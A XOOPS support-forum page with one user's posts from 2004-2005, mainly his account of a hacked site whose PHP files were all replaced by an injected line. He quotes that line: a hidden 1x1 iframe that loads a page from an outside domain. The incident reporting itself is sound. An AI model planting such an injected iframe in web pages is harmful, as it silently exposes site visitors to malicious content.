Support Forums - All Posts - XOOPS Web Application System

Forum Index

Board index » All Posts (blueangel)

« 1 (2) 3 4 5 ... 8 »

Re: Bad suprise on monday morning! Site hacked

2005/5/17 9:51
blueangel
Module Developer
Posts: 132
Since: 2002/2/20

I am happy to announce to all italian users that the official italian support site is online again. All the data has been succesfully restored, ciao

Topic | Forum

Re: Bad suprise on monday morning! Site hacked

2005/5/16 16:08
blueangel
Module Developer
Posts: 132
Since: 2002/2/20

Quote:

I don't know all the details, but my guess is that your host is playing a bit of "pin the tail on the donkey" to cover up insufficient security settings (enabling safe mode, disallowing system commands execution through webserver scripts and similar) or lack of patching the webserver/OS.

I agree with you, I believe that one hacker is able to exploit a vulnerability of a PHP Nuke site in order to upload malicious script on the server, but I also believe that with a good configuration it is possible to prevent that this script affects other accounts, even if my site is on a "shared hosting"

I only hope that they will take the necessary shrewdness so that this problem will not happen again

Topic | Forum

Re: Bad suprise on monday morning! Site hacked

2005/5/16 15:14
blueangel
Module Developer
Posts: 132
Since: 2002/2/20

the administrator of the server answered me that they have been attacked exploiting a vulnerability of a PHPNuke site that hosted on the same server!!

luckily they did a complete backup on saturday and they have confirmed that the site will be available again in a couple of hours

Topic | Forum

Re: Bad suprise on monday morning! Site hacked

2005/5/16 12:09
blueangel
Module Developer
Posts: 132
Since: 2002/2/20

ok, I will contact the hosting, thanks for your support

Topic | Forum

Re: Bad suprise on monday morning! Site hacked

2005/5/16 10:53
blueangel
Module Developer
Posts: 132
Since: 2002/2/20

it means that if all the folders permissions are set to CHMOD 755 and all files permissions are set to CHMOD 644, except the mentioned folder, is a problem of my hosting?

is possible than one module, not official, has some "holes" that can be used by an hacker to cause the problem that I have on my website?

Topic | Forum

Bad suprise on monday morning! Site hacked

2005/5/16 6:47
blueangel
Module Developer
Posts: 132
Since: 2002/2/20

I had a very very bad surprise while was accessing my site: blank page!

It was not the first time and I was thinking "is a problem with the server database that is down, in some minutes it will come back". But at the bottom of my Firefox browser I saw some strange "redirections" to the site www.tendomain.com and I had a bad feeling that something was broken.

I started the FTP and I found ALL PHP files on the server 106 bytes long with the following content:


<iframe src="http://www.tendomain.com/or2.html" frameborder="0" border="0" height="1" width="1"></iframe>

how could be happened ?

I am not a beginner of XOOPS, I have been the italian XOOPS support site webmaster for many years and I know all the basic security rules that a XOOPS' site must have! The site was running the latest version of XOOPS, and recently I did not install any new modules.

Maybe there is a vulnerability in XOOPS that has not been yet found, I am really lost now. I am luckiy that the database is safe!

what can I do in order to understand what has happened?

Topic | Forum

Re:Am I allowed to do this???

2004/10/22 5:52
blueangel
Module Developer
Posts: 132
Since: 2002/2/20

thanks a lot

as soon as we deploy the new theme of XOOPSIT I will contact you, so that you can release also your copy modified

Topic | Forum

Re: Am I allowed to do this???

2004/10/20 13:08
blueangel
Module Developer
Posts: 132
Since: 2002/2/20

many of our users asked the same question

we are developing a new theme for the XOOPS Italian Support Site, and when XOOPSIT will move to this new theme, we'll release for sure the old one, also here in the Themes Library

Topic | Forum

Re: XOOPS on PHP5 - success story ;-)

2004/8/5 6:32
blueangel
Module Developer
Posts: 132
Since: 2002/2/20

hi pavcio,
some hosting are starting to update the PHP versions from 4 to 5, and this cause of course problems with XOOPS 2.0.7

can you explain us more in detail how you made runnign XOOPS with PHP 5

thanks a lot in advance

Topic | Forum

Re: Avatar not working!

2004/5/24 10:14
blueangel
Module Developer
Posts: 132
Since: 2002/2/20

first of all why don't you update the site to the 2.0.6 version of xoops? maybe after this operation, if the problem is not corrected, it is easier help you to discover why avatars are not shown

the version 2.0.6 is the stable release from many months

Topic | Forum

Top

« 1 (2) 3 4 5 ... 8 »

Stats
Goal:	$100.00
Due Date:	Apr 30
Gross Amount:	$0.00
Net Balance:	$0.00
Left to go:	$100.00

Forum Index

Re: Bad suprise on monday morning! Site hacked

Re: Bad suprise on monday morning! Site hacked

Re: Bad suprise on monday morning! Site hacked

Re: Bad suprise on monday morning! Site hacked

Re: Bad suprise on monday morning! Site hacked

Bad suprise on monday morning! Site hacked

Re:Am I allowed to do this???

Re: Am I allowed to do this???

Re: XOOPS on PHP5 - success story ;-)

Re: Avatar not working!

Login

Search

Recent Posts

Re: Rebuilding and Updating a 20 years old Xoops Website from 2.0.18? to 2.5.11

Rebuilding and Updating a 20 years old Xoops Website from 2.0.18? to 2.5.11

Re: NewBB v 5.1.0 b 6

Re: NewBB v 5.1.0 b 6

NewBB v 5.1.0 b 6

Re: XOOPS 2.5.11 search user is not working

Re: oledrion

Re: oledrion

Re: oledrion

Re: oledrion

Who's Online

Donat-O-Meter

Latest GitHub Commits

{{ record.sha.slice(0, 7) }} - {{ record.commit.message | truncate }}